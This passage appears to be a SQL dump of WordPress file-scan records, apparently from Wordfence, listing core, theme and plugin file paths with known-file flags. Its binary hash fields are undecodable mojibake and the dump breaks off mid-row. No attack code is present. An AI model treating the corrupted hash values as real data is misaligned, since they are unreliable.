��}�x(��r�:a,zmK�H1|/��+��','',0,'?'),('���D0!24���4','wp-includes/wp-includes/js/wp-util.min.js',0,'�R�H��OZ\'�]1�T','�R�H��OZ\'�]1�T','���;@�O0,�KG#�&h0�RҘ�6�0���T','',0,'?'),('�\r�V��2P�-+x@�','wp-content/themes/twentynineteen/template-parts/header/site-branding.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���JŐ\\�;�^�q��','}�D�uغ��i��I|�{�&��މ��g��0���','',0,'?'),('��gx�A�Ȣ}�g�','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/XChaCha20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��]ኮ���ȣ&','��K��#�@JU�}F�����,���![','',0,'?'),('�;wr��Q�ś�d1|�','wp-content/themes/wp-barrister/library/images/icon-tu.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���3&v�m����Eh,','�9��i���\0 z\n���0��=�Pߗh`ڵ9C�','',0,'?'),('� @�;��*�|��','wp-includes/Text/Diff/Engine/string.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',':��=�M��\0��i)','����d��[�%�nZR��`������','',0,'?'),('�1t�v�3�9]AaC-','wp-content/plugins/wp-cerber/assets/flags/bs.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','r�t\Z���c��K�o�','_o &�\'����&�Q�R���~E�1�d','',0,'?'),('�5ְ�%j$��,]�˦q','wp-content/themes/sg-window/inc/customize-sidebars.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�z�؏����!�1','L\'!1ۧ1���و��db�f���9{U?�','',0,'?'),('�j�� -��cFo�k��','wp-includes/wp-includes/locale.php',0,'�Ʋ\04�)o�ybU^�','�Ʋ\04�)o�ybU^�','�<�6n�\'�J�����_�� �S%��GVJ','',0,'?'),('�x��\r���B��','wp-includes/wp-includes/sodium_compat/src/Core/Curve25519/Fe.php',0,'�W� ��,��~�r�','�W� ��,��~�r�','L>���e������h�\rF$�C�V������7�','',0,'?'),('����k�ɑ�����','wp-content/themes/advance/inc/widgets/front-posts.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���I��Dq�z2�f�',';w>E�����=t���q��pIV���1�','',0,'?'),('��]��p�R�/$�1�','wp-content/plugins/wordfence/views/common/page-fixed-tabbar.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�M#Ƃ,�n���j9{��','��+��������N)¨�����L K�z�(','',0,'?'),('���P��W2�.����','wp-includes/wp-includes/sodium_compat/LICENSE',0,'�x�6F�\0f����','�x�6F�\0f����','N��^q��yqܯ\r]�S��\\��[�C{V��y�w�','',0,'?'),('������浉���C��','wp-content/plugins/all-in-one-wp-security-and-firewall/images/shield-security-icon-36.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��r/6���Kd���|D','�)7; @v�L��>�]M|�c����)d����k','',0,'?'),('��_��J�=��ʿ�Kl','wp-content/themes/fastblog/index.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','o������d|5�Oѻ','��Z`�@���Q��cQ����N�>�>���','',0,'?'),('�����5��E�r','wp-content/plugins/wp-cerber/assets/flags/nr.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','*s�|�Ǯr�St��[','�bp%�a���,%M���q�^��4���$}�J','',0,'?'),('��_w�ƌ����','wp-includes/widgets/class-wp-widget-media-video.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','}◷>y�O�G�','10*�u���ۤ��y[\\,�/��7��6�\r','',0,'?'),('�Ұ�^�(�L�Ǡ�ǝ�','wp-content/themes/sg-window/img/icons/aim.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�WU���6 ��\'','B���v�,>yK�Cr� U���=��\n�l�ft�%/','',0,'?'),('���q@�U���Q&�','wp-includes/wp-includes/images/smilies/mrgreen.png',0,'-5��^����J�j���','-5��^����J�j���','���M��g�$��+;��\0�5����H&\\E6%w','',0,'?'),('�ւ��(\0W�eBҧ�','wp-content/themes/newsmag/inc/customizer/epsilon-framework/assets/img/posts_carousel.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��*�X-/��wO��Y�F','�^��ɶn%̹+�&}�!�C\Z3������','',0,'?'),('��:�NXǶ�����@�','wp-content/themes/capacious/inc/customizer/css/custom_font_awesome.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�/�(��:��@�f��','E���k��n\0�1|N^~,̭������','',0,'?'),('��A-��zN���','wp-content/themes/twentynineteen/inc/helper-functions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ŀ<)�8�j���/SԜ','�ք��8�J��j��\n�� ��g�^\'�','',0,'?'),('�� ���b��o���','wp-content/themes/wp-barrister/library/images/icon-tw.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','+��7�E�ʳHu','�m�}�$7�~V���X]\"^���b|�&��','',0,'?'),('�-|V���H�%��','wp-admin/site-health.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','6�㚮�4�~�l��v-','0�co 觥���.����_A�T�\0^����)','',0,'?'),('��Ǣ�Bմ(�\\�0J','wp-includes/class-wp-text-diff-renderer-inline.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�8�l��_\r�u���','��פme�,��V����9�}���� y���v�','',0,'?'),('�(��u�L)����O','wp-content/plugins/wordfence/js/admin.ajaxWatcher.1623076348.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�_��7<�yf�\nb:ʄ','&O3w��Q��d�x�������@\n���m�?�$','',0,'?'),('�0:���6QUGA��k','wp-includes/wp-includes/class-wp-term-query.php',0,'Y\"������4XYt[','Y\"������4XYt[','��m⟮/�a�Ͳ(yMG.��dЪZ+����','',0,'?'),('�6N]bN��R������','wp-content/plugins/wordfence/vendor/geoip2/geoip2/.gitmodules',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ڄ �q�?s1����U','�REkks&]!i�_����\"���y~����Ka�','',0,'?'),('�;�%N!9�\nL&N���','wp-content/plugins/wordfence/views/onboarding/modal-final-attempt.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','.Ke�\"/�w�','KwĿ���\Z˅�+CH�J\n\'��x ���M','',0,'?'),('�>XY\07�l��yn','wp-content/themes/hueman/searchform.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' m-�e��~gaQ��h','�i��Va�9�u�@~�P;#��HwJ�����Q','',0,'?'),('�@���sB0<�{l�3��','wp-includes/wlwmanifest.xml',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Ԑ����i�^��','�ƤJľ**X|i���cy-�u6p�C-�$*\n�','',0,'?'),('�B��F=��Ğ�zj,','wp-includes/wp-includes/js/dist/vendor/wp-polyfill-node-contains.js',0,'���w��%[U��3�','���w��%[U��3�','Et������z��fD:x?���o��c�ڋ 8P','',0,'?'),('�D=������S��C','wp-includes/sodium_compat/src/Core/Curve25519/Ge/Cached.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�%�X�������`йKZ','S�W��,��f���K{��\\�������^Y/�','',0,'?'),('�N�p!ֽ��Dfw','wp-includes/wp-includes/images/smilies/icon_surprised.gif',0,'U��-��#+����0�?','U��-��#+����0�?','��cuy�X�ؓ�A��d�5[=w>�*S�pwe�._','',0,'?'),('�X7� ���j��]k^`','wp-includes/wp-includes/js/tinymce/plugins/wpdialogs/plugin.min.js',0,'QO1�/<�>%\"�X��','QO1�/<�>%\"�X��','�6�r�*�IY\0�C�9<��Jږ J*�xD','',0,'?'),('�k����e<F��4','wp-admin/js/revisions.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>��\rӐn�� ����\Z','\roMQC�irtM�ҡ�����I����_','',0,'?'),('�}el����{Hd8g�','wp-includes/wp-includes/js/dist/edit-post.js',0,'Ե3<�Y5Ω8�z��;','Ե3<�Y5Ω8�z��;','�I&A ��k9H��xjW�;��JL�fS]z','',0,'?'),('��-�ZX|���*�c߽','wp-content/themes/newsmag/inc/theme-setup.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','.��>2��+s�)�䐢�','���\'��ǐx���(��M4Y����s','',0,'?'),('���D��=K�49���','wp-includes/js/codemirror/codemirror.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�23j���1��(D��','��Ό�,a�u��@�s�Y%K���-o��n\r�','',0,'?'),('���\"^�E�~*�1�','wp-content/themes/auberge/changelog.md',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Z:�������$>g','i��.��|���Lb���a��;�R9\r�','',0,'?'),('�������CMp<E��','wp-includes/class-wp-oembed.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��)�Q�\\�2%����','���`fO2��c���3/(�A̝T�tA�p','',0,'?'),('�����k_t����','wp-content/themes/hueman/license.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�� 7����Z:8I�`�',']��FH�p6��O�@#h��:L���ɠ�@�k�','',0,'?'),('�����:������UV','wp-content/themes/skt-pathway/woocommerce.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��,����9�8��w�','��E�d;�v�YԻ\n�Vm�rz��-�7�r{�','',0,'?'),('��M\\B�h����f[','wp-includes/wp-includes/general-template.php',0,'�lGfBp�X0=�aESy','�lGfBp�X0=�aESy','�qǼ<�x��Ӡ�A��X/rUCG�lW�\n*e','',0,'?'),('����쉹A�Ȝ�3\"g�','wp-includes/wp-includes/js/tinymce/plugins/wptextpattern/plugin.js',0,'E ��-N�o����','E ��-N�o����','�L�I�Y�ow�)�4!:�;?��','',0,'?'),('��6K1���(��}/AX','wp-admin/network/user-new.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Y���G-w���=�','|6���.�W��NScˆ��#��ޱ\0�2','',0,'?'),('���i��<��g6��','wp-content/themes/newsmag/sidebar.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','H�d6�� � |��*#','bꥍLY��Q��t-*vN|ޮ�e�5�9�οQE','',0,'?'),('�ݧlp�S*LST$�8/','wp-content/themes/twentytwentyone/assets/sass/01-settings/file-header.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',']���/k�$a��E9h�','8�E/ů�KK\rЛx���]2j�IԐu\r�kz','',0,'?'),('��7�Ub�&�9PY��','wp-content/themes/wp-barrister/comments.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�k�x�:�>��yR�8�l','[�.���ە�z#9R�h�NV)�`6e>�d�','',0,'?'),('�ߐ��~��`A/mh�F','wp-includes/wp-includes/default-constants.php',0,'����f\n��G8��','����f\n��G8��','��/�R�5ڍC,�i�K�f�}���\\4/\0��','',0,'?'),('��ĩ�}x�(T��','wp-includes/js/dist/block-library.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','g9ޯ\0�\n.z�A�-','\'!P�\'��L�0�O\rh.\"����G��[�Z','',0,'?'),('���T`�p����<','wp-includes/wp-includes/load.php',0,'x8�7n�LH�g�gf�R','x8�7n�LH�g�gf�R','ŗْl5�������Xt�����C�\n�mA','',0,'?'),('���Z�c�u�1��J�','wp-content/themes/newsmag/inc/customizer/epsilon-framework/assets/img/posts_vertical_list.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ʹ���,9�%�=','\\��A���7� �x$�WI�:\'-��F+& ��','',0,'?'),('�=ń-���{�k�w','wp-content/themes/pine/projects-list.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','/R�<�o�\ZL\r���c�','�\\+��W����>�\'��y����s���X�W�','',0,'?'),('�^Q6l��J!� �ͦ','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���\\��oN�.��','>4��i3�|��v1�N��6�wD�)M��jr','',0,'?'),('��+�x�~� yi&\0Q','wp-content/themes/twentytwentyone/template-parts/header/site-nav.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��e@ڞF\n��1���','ǛO��g�\ZXPECn��o�`�����+�i','',0,'?'),('� ń1�r}mJGW�R��','wp-content/plugins/wordfence/views/scanner/options-group-performance.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���P�=�PҤ��� ','�-9��\0t��D\\6�9s]��\\e\0R�r���','',0,'?'),('�!�e�A�<���#�s�','wp-content/themes/advance/inc/kirki/includes/field/class-kirki-field-switch.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','<��\'���[��4 �','k�[�?��2��8n�h���C�Z2���DL9O��','',0,'?'),('�#K=iq>�u�p�!�k�','wp-content/themes/hueman/functions/init-sidebars-widgets.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���:oTG�p�g��','�gn�jAgM#�SF�b��U�Rʉ!����','',0,'?'),('�0�$�\'`�Õ�n�\\','wp-content/themes/twentynineteen/sass/site/header/_site-featured-image.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','&!<��Tp���+','�I�ʌ�?�(5�]]F�r�A�~�{t�J?��','',0,'?'),('�7ނ�y��[\"�p�P','wp-content/themes/storeone/inc/include-kirki.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�<�?y����;���','����_�k��/�У@xu:I@P�6lݲuW\0','',0,'?'),('��x8��$lw=�W}�','wp-content/themes/promote/inc/kirki/includes/field/class-kirki-field-editor.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','y������)y1kREX','�_����۪�B��b�k�\Z����Y�H��p�','',0,'?'),('���R�N�6���5\0��','wp-content/themes/event/js/source/event-main.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Cӡgk$�r���||6�','u�r��ئ�NP9ke��K;Ӹ�@�k�i�O�r','',0,'?'),('��ɱ%��a{Z�j %�','wp-includes/class-wp-editor.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�s��\'+���������L','/%�k�\r<���&u�NKI�v���GrA��','',0,'?'),('����I�:4P�U���','wp-includes/SimplePie/Cache/Memcache.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���u���5uyS��','�/��M�[�Qt�n.?χIqA?Tj<��woRI','',0,'?'),('���U�ϋ���S�88:O','wp-includes/wp-includes/js/jquery/jquery.color.min.js',0,'rq�*X�gq�O�(͈','rq�*X�gq�O�(͈','�x�2���<���k���Qݯ�����{��','',0,'?'),('��,���`�t��t�b7','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/i18n.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�MP�<^f�G�� C','V�$oBޞj��f0�֫�Qx�u�T�=a��`�K','',0,'?'),('��8K�� ?O]ʹY','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/rules.key',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\ZlY^[F\r�2xʻ','�6=���S�q�-5 )��E�L}A�ViA]���','',0,'?'),('��苼����3���','wp-includes/blocks/shortcode/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[~ .z\n.a�Y^�h�w','�(��� �̰�bu���e�\nud���l�s&�','',0,'?'),('����p�l4[���e��','wp-admin/js/inline-edit-tax.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��(-\'���R���\"','�ݔ��7��\"^D�C���o>0ս�2]L�','',0,'?'),('��xw%��]�z^��`�','wp-content/themes/advance/inc/kirki/includes/controls/class-kirki-controls-slider-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','P���[�Xwt�~�?','��7&�s�f?��0!���7��\0�t��w�z�','',0,'?'),('��:に5�����','wp-content/themes/newsmag/assets/sass/forms/_buttons.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�3��ɏDޡ��','KkI�\' j?���{��s8�y߈j9�A�T*��v','',0,'?'),('��rh���u�Yw�\Zխ','wp-content/themes/skt-pathway/images/search-icon.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ω�W吃`\0�d��O','�\0��E�8O2�}�\'�y�>��e�(8�8','',0,'?'),('�����Ѝ3�>#�.�','wp-includes/rest-api/class-wp-rest-request.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��)0\0�����l3','oēՆ��^�!\0De�x��%�.2��E6]R|','',0,'?'),('��K|H�#�[��x��','wp-includes/blocks/tag-cloud/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��M0����*��','���-ZE�\n�*��6�]\\� ]m�{N��','',0,'?'),('�R��=��*�d��n�','wp-admin/includes/media.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' �V(#=���0�����?','�8�;�cb7�]���tt-p��#�Q(��C��','',0,'?'),('� e1�n2��c��Χ','wp-content/plugins/wp-cerber/assets/flags/uz.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','.��S�UA��R-Ƌ','Ț���1}\n{%`Tbh����3�ٷ���.D�','',0,'?'),('��8��=����[ձ�','wp-content/plugins/wordfence/modules/login-security/views/page/manage.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','eƧ�A.�E�2��$','YPU���ѱ�O�*��N=|H�Tt���\\8`','',0,'?'),('��A����)D4�','wp-includes/pomo/plural-forms.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','s_7�;� ]�Lvlɟ','��T�U#:`B=����ۙNy3�����J�','',0,'?'),('�%M�sxs���Qd','wp-content/themes/gambit/js/html5shiv.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�,��Y�Iu��W�Q�m�','�R�y1N�hu�¿���I}��؞���)i','',0,'?'),('�-^g��̺@\0/���','wp-content/index.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','gD,V�=\\�bP','k�����~ ��UH\Z��x�P��Ā��<��;X�','',0,'?'),('�-�+;���7���S�p','wp-content/themes/Kent/FT/plugin/options-framework/options-framework.php',0,'\"F�W�/��鱌7zl','\"F�W�/��鱌7zl','d���Q�:�g�l��Ntp�/1�D��>ā�','',0,'?'),('�.ն���Zg{�=��','wp-admin/css/customize-controls.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','%�.� h`3XT\\W�ߴ','4�G˼���GO��w���m�qV�z8��밹','',0,'?'),('�H}�A�J�\nG�o)u','wp-content/plugins/wordfence/modules/login-security/css/login.1623076348.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','m��᳀��2���rmV','���r���J]s6�8�2!��\ZpG����','',0,'?'),('�KiN��R��K����m','wp-content/themes/Kent/FT/js/colorset.js',0,'-�*Ј��`��_��','-�*Ј��`��_��','o�$�V�~,�e�qה2�$3���H�TZ���#�','',0,'?'),('�n:�zW_�B�S�R��','wp-includes/js/jquery/ui/resizable.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','vk�mO,�步n3���','u�-�xP�un48�#�.�5*X�}��z��J��g�','',0,'?'),('�s�=(���\ngfP�h��','wp-content/plugins/all-in-one-wp-security-and-firewall/admin/wp-security-user-registration-menu.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ϼ~c��祐i�','��L�3�gQ����������l\"�K�E�3_','',0,'?'),('�w ���+�j���','wp-content/plugins/wordfence/views/common/status-circular.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����)�.=���g','q4^\"-�9����\nd1q����O,��','',0,'?'),('��7ڔ!�2�x%�XN�3','wp-content/plugins/wordfence/views/options/option-token.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��D�_\r�w�{iv�','W�q��$�|��yn���a�$\06ܖ<(�Ƴ�}','',0,'?'),('���~��a%��!�P','wp-includes/js/tinymce/skins/wordpress/images/pagebreak-2x.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','{�6�#UQ:��|>#��','�(��[\n�̻�o�RAo�3��^����','',0,'?'),('���#��D�/w���4�','wp-content/themes/newsmag/assets/vendors/fontawesome/fontawesome-webfont.ttf',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�S�����CCӊ�/','��f����/;�~nʿZ��\0�0�bJ돺��\\x','',0,'?'),('��BV�\'/�l���Ov','wp-includes/wp-includes/js/jquery/ui/tooltip.js',0,'�&�<Q�1}�������','�&�<Q�1}�������','�M@�jM�m��\\����`T@�.���Rl.��','',0,'?'),('�����L?@��.~O�','wp-admin/css/colors/midnight/colors-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�E~��2\'o �?�','� UWt��\"\Z��;��|w�^ r\"�:[_cA�}','',0,'?'),('��3�(�q7M�hv��','wp-includes/wp-includes/sodium_compat/src/Core/Base64/UrlSafe.php',0,'��pF��t1�+���','��pF��t1�+���','�;�}��\0[���\'\rq�����ĥd�;#�.','',0,'?'),('��qS]�&i�=žV�','wp-content/themes/advance/inc/admin/img/3.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ʰ�\r�b�\\��!~�Ap','�����|��7h�wP^���y��;0i/����','',0,'?'),('����畵ư�Sr���','wp-content/themes/promote/comments.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�q��[܁��\r����','��D��m\'`���߃�1P�,�<��c�QKh','',0,'?'),('����T\n���e.(��','wp-includes/class-wp-image-editor.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','(\r��^��k���+)','�GY��<\Z�����\"B��v�Ԅ��2K9i��bQ','',0,'?'),('��ؘ�-�m4)}�� �','wp-includes/js/dist/reusable-blocks.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�DW����8ӳ$�','F�1�ω4��z���*A�⡯���$���(��8�','',0,'?'),('���[�g�@2:<)�','wp-content/themes/auberge/assets/js/customize-preview.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','.�����#�ƧK!<','�����D�V����}�TP�/�3���+7�5�]','',0,'?'),('����TM)��7�^\\9��','wp-includes/wp-includes/js/swfupload/handlers.js',0,'��*�#�0�-�Ճp�','��*�#�0�-�Ճp�','H�#����a:��1������߯orrj�uz�zV','',0,'?'),('����}c�>���[G�@�','wp-includes/wp-includes/rest-api/class-wp-rest-response.php',0,'�f�0����Sy?�','�f�0����Sy?�','�fG]< *�:m/K<-�C�~�5�%���Sw','',0,'?'),('��Z�p%\'n\Z��Wj��','wp-content/plugins/wordfence/crypto/vendor/composer/autoload_real.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���ey���B�J','>?z�y��O�IncC!��Y�����;/:�<\nJ�','',0,'?'),('��}���PÛ�P\\�\Z','wp-includes/js/tinymce/plugins/wpautoresize/plugin.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','=���B�9�$v\r ','�X�-��y���H��VKr�V��Y˴t���X��','',0,'?'),('��R�,�A���\Z�GJ\'-','wp-includes/default-filters.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���=��B/˥oH:z','G�$�������q��ԑZ}\n�F�TB�刔','',0,'?'),('���\n\\�ɶ.5���','wp-includes/images/xit.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�� 3X�ī9+�6n~','�� s������ۨ��S,md�\\Yb�Ƈ��o','',0,'?'),('���Vc�%��Iv���','wp-includes/wp-includes/blocks/separator/block.json',0,'L��Tz�g�\'U�c','L��Tz�g�\'U�c','�����굗�Ij��2%]��\\&q��Jw\\�','',0,'?'),('��2�\n�<p���o�','wp-content/themes/anima/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','s�rM�h!vk*ͷ�','LD��\\TL`+�O��2�.\\���QK9>��','',0,'?'),('���Ь�p�I��YR','wp-includes/sodium_compat/src/Core32/BLAKE2b.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','F�K��y�\"��J���','~T��)_����ԇ���YH+���ɏ\'� ;','',0,'?'),('�\"=��&�u�`~�`}�','wp-content/themes/skt-pathway/images/bq_bubble.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',':\\밿V�S�\n�����5','� ?h�a� �����^ъ!��.RT(;','',0,'?'),('�0��kl)���','wp-includes/wp-includes/IXR/class-IXR-error.php',0,'g6\"���u\\\'3����b�','g6\"���u\\\'3����b�','*?�ۧU�=�?�,]��0=C����Z-�6Dq.�G','',0,'?'),('�#2:ٰ|$\"����v}','wp-content/themes/travel-stories/font/Open-Sans-Regular/opensans.ttf',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','l���ڏ��/)͙�','�a`�7�2�o M�2\0�W �����rA����?�','',0,'?'),('�(Њ�QB&����Q?�','wp-includes/blocks/categories.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','&�[sȥ��>JG�^�','��G5�K>�6��Fcf\n��&� �;�t��l','',0,'?'),('�.oXN+���3�hV-;','wp-content/themes/promote/images/slider.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','(̌��*IaQg��HR�','-Qr#H76:z\\N��V}��Ǜ��1��2l�A','',0,'?'),('�/�Х� qm&VMc~�','wp-includes/wp-includes/rest-api/endpoints/class-wp-rest-themes-controller.php',0,' ~��ZJ�yΧ�%���',' ~��ZJ�yΧ�%���','�hH��M����7�m��\'iB�@�>�','',0,'?'),('�6�K�Ue^zO��','wp-content/themes/hueman/assets/front/img/demo/5-160x160.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','tʼn�a�Z��}G��V','����6N\'�Hu�3[Z����R���a�hYk0','',0,'?'),('�D����]�|�$�','wp-includes/js/mediaelement/wp-mediaelement.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�(D�q�|�����','P�E+#��M�s;agL���e��S�MN��r=','',0,'?'),('�Ph�����rV�','wp-admin/css/revisions-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Ɲ����L�$�.\ZDΦ','�9Ps2�@N2��L��@F/�T��f��4�R','',0,'?'),('�P��]D��\'�-�<b','wp-content/themes/advance/inc/kirki/includes/controls/class-kirki-controls-number-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','y-���~��I�q�s�','�I&��\n$��E:��N��r�t�\ZK(o\rͰ}��','',0,'?'),('�W��iQ^S��� ���','wp-content/themes/weblog/acmethemes/customizer/options/breadcrumb.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','S|�_�X�qef�j<',']�ObiЅ^��~��\"�\'ՠOE���WH','',0,'?'),('�c �[�c�5Of<�pN','wp-content/themes/gambit/js/jquery.flexslider.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���{I6\"2A�d���','�vi�өٱ�X�nd��kR{#���Wz�x�T�','',0,'?'),('�f��@Ts�;��\0r��','wp-content/themes/skt-pathway/content-page.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9�f;�t:S}��5��L','��.��+u�ά;���៝���\r�','',0,'?'),('��`�!��ŏ��3`�','wp-content/plugins/all-in-one-wp-security-and-firewall/images/plugin-icon2.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Qd�B\\�*ض���','n�Z�/ļ���.3Е���+�w�\'*��`��','',0,'?'),('�������9]��\'�9�','wp-includes/wp-includes/css/wp-embed-template-ie.min.css',0,'7{WP�L�{H���I�','7{WP�L�{H���I�','\\aWq1��+��Я�o�L�Y\0�K���%<','',0,'?'),('�����W���~��','wp-content/themes/skt-pathway/css/navigation.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','*k������?U@t2�','���p�����V?\\CI\'ւ�ECn�X\05\"','',0,'?'),('���\\aCsHG�M�Qܰ�','wp-content/themes/fastblog/page.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','o�YS���R����8f','~�I3*ۼ$�P�(�A���o��hj�','',0,'?'),('�������t�AA~q��','wp-content/themes/auberge/template-parts/content-none.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��t��4R�l���Z6','\0������NC|����ȷl%�AθI:�}_?','',0,'?'),('��z�+p�}2�7�','wp-content/themes/anima/cryout/css/jquery-ui.theme.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��f�\n�<�W�O��','�UG����ΰ�R煥��fk����0���','',0,'?'),('��$_\n�1�X����9�','wp-content/themes/spidermag/assets/images/both-sidebar.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','te�: ���A�ƌ','(����-���(E�\n\\\ZhI��L$��]t','',0,'?'),('��2]&֔#���^F�q�','wp-content/plugins/wordfence/vendor/maxmind/web-service-common/src/Exception/PermissionRequiredException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�2� �/�E!�<s�','\\�=���5��3 